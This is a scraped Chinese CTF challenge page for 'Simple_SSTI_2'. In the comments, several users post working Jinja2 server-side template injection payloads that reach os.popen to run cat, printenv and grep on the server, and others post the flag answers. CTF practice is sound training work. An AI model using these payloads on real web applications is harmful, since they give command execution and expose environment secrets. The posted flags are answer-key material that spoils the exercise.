Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 16545
提  示:
描  述:
Simple_SSTI_2
评论
超爱西西鸭 1年前

/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}

回复 1

pettter 1年前

?id={{config.__class__.__init__.__globals__['os'].popen('printenv').read()}}

回复 1

不会写代码的菜鸟 1年前

大佬们,为啥不能直接flag={{os.popen('cat ../app/flag').read()}}还需要加上那么多前缀

回复 1
qingchuan 1年前

因为没有import os,os是未定义的

回复 5

q1152874733 1年前

http://114.67.175.224:11052/?flag={{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag').read()")}}

回复 1

Royic 2年前

/?flag={{config.__class__.__init__.__globals__['os'].popen('grep -r flag{ ./').read()}}

回复 0

sz007 2年前

flag{6c85015e98aa08e245d15289704dfd8b}

回复 0

如你所愿 2年前

flag{5566f3c3cc3821f4a768384d2a387aae}

回复 0

109349 2年前

flag{2682096b09e88fe5f1faee731c0d36d7}

回复 0

z0shell 2年前

/?flag={{config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read()}}

回复 0
Masterk 2年前

这是怎么想出来的。。

回复 2

ABUDUWILI 2年前

flag{ffb1bde14170624274f424caf4406a1a}

回复 0

WriteUp

image
valecalida

5 金币

评分(15)

解题动态

薄言. 攻破了该题 1天前
Zfc 攻破了该题 1天前
周文君 攻破了该题 2天前
杰哥 攻破了该题 3天前
zhaoguanjei 攻破了该题 4天前
tqlhg 攻破了该题 4天前
GrantFly 攻破了该题 6天前
yezhongyu 攻破了该题 6天前
heting 攻破了该题 6天前
y-123456 攻破了该题 7天前
271199@ 攻破了该题 8天前
dacming9527 攻破了该题 8天前
ggtom 攻破了该题 9天前
1586905095 攻破了该题 9天前
serena7780 攻破了该题 11天前
CTF-大王 攻破了该题 15天前
Ahri 攻破了该题 16天前
奥特曼 攻破了该题 16天前
SQZ 攻破了该题 17天前
wuyong5025 攻破了该题 18天前
问题反馈